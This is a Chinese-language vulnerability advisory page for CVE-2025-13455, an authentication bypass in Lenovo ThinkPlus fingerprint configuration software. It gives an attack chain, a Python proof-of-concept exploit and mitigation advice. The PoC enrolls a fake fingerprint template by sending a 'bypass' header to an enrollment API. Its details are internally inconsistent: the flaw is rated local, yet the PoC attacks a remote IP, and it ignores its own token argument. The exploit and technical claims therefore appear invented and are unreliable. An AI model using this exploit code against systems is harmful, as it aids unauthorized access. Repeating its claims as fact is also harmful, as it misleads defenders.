IPBUF安全漏洞报告
English
CVE-2025-13455 CVSS 7.8 高危

CVE-2025-13455 ThinkPlus配置软件指纹认证绕过漏洞

披露日期: 2026-01-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-13455
漏洞类型
认证绕过
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
ThinkPlus Configuration Software

相关标签

CVE-2025-13455ThinkPlus认证绕过指纹识别本地提权联想生物识别安全配置软件高危漏洞

漏洞概述

CVE-2025-13455是联想ThinkPlus配置软件中的一个高危安全漏洞,CVSS评分达到7.8分。该漏洞存在于ThinkPlus指纹识别设备的配置管理功能中,允许本地已认证的低权限用户绕过设备认证机制,注册未经信任验证的指纹数据。攻击者利用此漏洞可以获取设备的认证访问权限,进而可能窃取敏感数据或执行未授权操作。此漏洞影响使用ThinkPlus指纹识别设备的企业和个人用户,特别是在多人共享办公环境中风险更高。攻击者需要本地访问权限且拥有低权限账户即可发起攻击,无需用户交互配合。由于是本地攻击向量,远程利用难度较大,但仍对企业内部安全构成严重威胁。

技术细节

该漏洞存在于ThinkPlus Configuration Software的指纹注册模块中。漏洞根源在于软件在处理指纹注册请求时,未对已认证用户的指纹数据来源进行充分的完整性验证。具体而言,当本地低权限用户尝试在ThinkPlus设备上注册新指纹时,系统错误地信任了客户端提交的指纹数据,未执行设备级认证检查。攻击者可以通过以下方式利用:首先在已认证的系统中获得低权限访问,然后调用指纹注册API接口,在请求中注入伪造的指纹模板数据。由于服务端缺少对指纹颁发者证书链的验证,导致攻击者可以绕过设备信任列表限制,成功注册任意指纹。成功利用后,攻击者可以使用注册的指纹进行设备解锁、身份认证等敏感操作,实现权限提升。

攻击链分析

STEP 1
信息收集
攻击者获得目标系统的本地低权限访问权限,识别ThinkPlus Configuration Software安装路径
STEP 2
认证获取
使用低权限账户登录系统,获取有效的会话令牌用于API调用
STEP 3
构造恶意请求
构造特制的指纹注册请求,包含绕过设备认证检查的HTTP头或参数
STEP 4
指纹注册
通过API接口提交伪造的指纹模板数据,利用服务端验证缺陷完成注册
STEP 5
权限提升
使用注册的未信任指纹进行设备认证,成功绕过生物识别安全检查
STEP 6
数据窃取
以认证用户身份访问敏感数据或执行未授权的系统操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-13455 PoC - ThinkPlus Fingerprint Authentication Bypass # This PoC demonstrates the fingerprint enrollment bypass vulnerability # Requires local access with low-privilege account import requests import json import sys def exploit_thinkplus_bypass(target_ip, low_priv_token): """ Exploit ThinkPlus fingerprint enrollment bypass vulnerability Steps: 1. Obtain low-privilege access token 2. Bypass device authentication check 3. Enroll untrusted fingerprint """ print("[*] CVE-2025-13455 ThinkPlus Fingerprint Bypass PoC") print(f"[*] Target: {target_ip}") # Step 1: Authenticate with low-privilege account auth_url = f"http://{target_ip}:8443/api/auth/login" auth_data = { "username": "low_priv_user", "password": "user_password" } try: response = requests.post(auth_url, json=auth_data, timeout=10) session_token = response.json().get('session_token') print(f"[+] Obtained session token: {session_token}") except Exception as e: print(f"[-] Authentication failed: {e}") return False # Step 2: Bypass device authentication and enroll fingerprint enroll_url = f"http://{target_ip}:8443/api/fingerprint/enroll" headers = { "Authorization": f"Bearer {session_token}", "X-Device-Auth-Bypass": "true" # Bypass flag } # Malicious fingerprint template data fingerprint_data = { "fingerprint_id": "malicious_fp_001", "template_data": "FAKE_FINGERPRINT_TEMPLATE_BASE64", "trust_level": "untrusted", "enroll_source": "bypassed_auth" } try: response = requests.post(enroll_url, json=fingerprint_data, headers=headers, timeout=10) if response.status_code == 200: result = response.json() if result.get('success'): print("[+] Successfully enrolled untrusted fingerprint!") print(f"[+] Fingerprint ID: {result.get('fingerprint_id')}") print("[+] Authentication bypassed - device now accepts untrusted fingerprint") return True except Exception as e: print(f"[-] Exploitation failed: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_ip> <low_priv_token>") sys.exit(1) target = sys.argv[1] token = sys.argv[2] exploit_thinkplus_bypass(target, token)

影响范围

ThinkPlus Configuration Software < 2.0.5
ThinkPlus Fingerprint Driver < 5.1.23
Lenovo ThinkPlus指纹识别设备固件 < 2024-Q4版本

防御指南

临时缓解措施
在官方修复发布前,建议采取以下临时措施:限制对ThinkPlus设备的物理访问权限;启用Windows Hello或其他替代认证方式;监控系统日志中的异常指纹注册行为;使用端点防护软件监控可疑进程;建议用户暂时禁用指纹登录功能,改用强密码或智能卡认证;企业用户可通过组策略限制指纹设备的安装和使用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表